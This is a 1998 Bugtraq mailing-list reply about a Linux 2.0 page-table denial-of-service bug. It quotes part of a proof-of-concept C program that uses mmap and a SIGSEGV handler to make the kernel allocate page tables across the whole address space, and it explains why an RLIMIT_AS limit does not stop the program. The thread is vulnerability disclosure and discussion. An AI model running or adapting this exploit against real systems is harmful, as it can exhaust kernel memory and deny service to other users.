[6857] in bugtraq
Re: linux 2.0 PTE bug
daemon@ATHENA.MIT.EDU (Pavel Kankovsky)
Fri May 29 12:54:42 1998
Date: Thu, 28 May 1998 21:23:34 +0200
Reply-To: peak@kerberos.troja.mff.cuni.cz
From: Pavel Kankovsky <peak@KERBEROS.TROJA.MFF.CUNI.CZ>
X-To: pedward@WEBCOM.COM
To: BUGTRAQ@NETSPACE.ORG
In-Reply-To: <199805262111.OAA25893@s1000e2>
On Tue, 26 May 1998 pedward@WEBCOM.COM wrote:
> (it really has nothing to do with resources). The main factor is RLIMIT_AS,
> defined in /usr/src/linux/include/asm/resource.h, it controls how much virtual
> memory that a process can map, mmap utilizes virtual memory. You can
> safely throttle people by running a program which calls setrlimit(2) with
> RLIMIT_AS as the resource. By far, 3GB is too much.
>
> This is only a DoS if you LET it be a DoS.
>
No. Re-read the program carefully:
<quote author="p6mip300@INFOP6.CICRP.JUSSIEU.FR">
void the_handler(int x)
{
signal(SIGSEGV, the_handler);
touch_me++;
if(mmap((void *)address, 4, PROT_READ,
MAP_FIXED|MAP_PRIVATE, fd, 0)==(void *)-1) {
perror("mmap");
exit(1);
}
}
void main(void)
{
[...]
signal(SIGSEGV, the_handler);
/* 3*1024*1024*1024 = TASK_SIZE,
* 1024*4096 = number of bytes one pte can map */
for (address=0; address<3*1024*1024*1024; address+=1024*4096) {
i=*(unsigned long *)address;
if (touch_me) {
touch_me=0;
munmap((void *)address, 4);
}
}
[...]
}
</quote>
The program allocates ONE page for each 4MB block of address space. This
makes 768 pages (3MB). It would hardly hit a (reasonable) AS limit even if
it did not disallocate the page having touched it.
It can run with RLIMIT_AS set to 1MB. At least on my system--I have
tried it (according to /proc/*/status, VmSize was 904 kB).
--Pavel Kankovsky aka Peak [ Boycott Microsoft--http://www.vcnet.com/bms ]
